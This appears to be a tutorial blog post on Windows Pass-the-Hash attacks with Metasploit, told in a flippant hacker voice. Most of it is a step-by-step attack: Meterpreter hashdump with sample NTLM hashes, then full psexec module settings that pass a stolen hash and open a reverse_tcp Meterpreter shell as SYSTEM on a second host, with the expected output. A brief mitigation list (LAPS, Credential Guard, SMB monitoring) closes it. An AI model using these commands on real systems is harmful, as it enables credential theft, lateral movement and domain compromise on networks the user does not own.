Pass-the-Hash (PtH) Attack — MSF Edition (Target: Windows)
Alright, buckle up. Let’s talk about Pass-the-Hash the ultimate Windows party trick where hackers skip the password nonsense and just slap the hash on the table to get in.
WTF is Pass-the-Hash?
Pass-the-Hash (PtH) lets attackers authenticate to Windows systems using NTLM hashes instead of plaintext passwords. Windows accepts these hashes because… well, legacy stuff and enterprise backwards compatibility. Thanks, Microsoft.
- No password cracking needed.
- Super popular for lateral movement.
- Still works way too often in 2025.
Attack Scenario
So let’s say you’ve popped a Windows machine (e.g. via EternalBlue, phishing, or magic). Your goal: pivot to another Windows target using the stolen hashes.
Step 1 — Dump Hashes from Windows
You’ve already got a Meterpreter session on your first compromised Windows box. Time to grab the hashes.
Dumping with Meterpreter:
meterpreter > hashdumpExample output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88aad3b435b51404ee3c234c30e3e84d:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:f8f7e33a9b35e6ab5f5acabc1e34567d:::
The last chunk is the NTLM hash you’re after.
Step 2 — Fire Up Metasploit for PtH
Now you want to authenticate to another Windows target (say, 10.10.10.20) using the hash you stole.
Metasploit’s psexec exploit is your friend. It lets you connect to a Windows box via SMB and execute commands — all using the hash instead of the password.
Example MSF Commands
Start by loading the module:
use exploit/windows/smb/psexecThen set your options:
set RHOSTS 10.10.10.20
set SMBUser Administrator
set SMBDomain WORKGROUP
set SMBPass aad3b435b51404eeaad3b435b51404ee:88aad3b435b51404ee3c234c30e3e84d
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_IP>
runNote:
-
The
SMBPassvalue uses the format: LM:NTLM hash. -
If you don’t have an LM hash, repeat the NTLM hash in both fields. E.g.:
set SMBPass 88aad3b435b51404ee3c234c30e3e84d:88aad3b435b51404ee3c234c30e3e84d
Step 3 — Get Your Shell
If it works, you’ll see:
[*] Started reverse TCP handler on x.x.x.x:4444
[*] Service started successfully...
[*] Meterpreter session 2 opened
Congrats. You’re now SYSTEM on the second Windows box no password cracking, just pure hash power.
Risks
- Massive Lateral Movement: Attackers can hop across Windows machines like they’re playing hopscotch.
- Domain Compromise: One hash can lead to domain admin takeover.
- Detection is Tricky: Looks like normal SMB traffic if you’re not paying attention.
How Not to Get Owned
- Use LAPS so every Windows machine has a unique local admin password.
- Deploy Windows Defender Credential Guard where possible.
- Keep privileged accounts off regular workstations.
- Monitor SMB and NTLM auth logs for weird patterns.
- Restrict lateral movement via network segmentation.
Side note: Even in 2025, PtH works because old Windows protocols die hard. Don’t underestimate how many networks still leave this door wide open.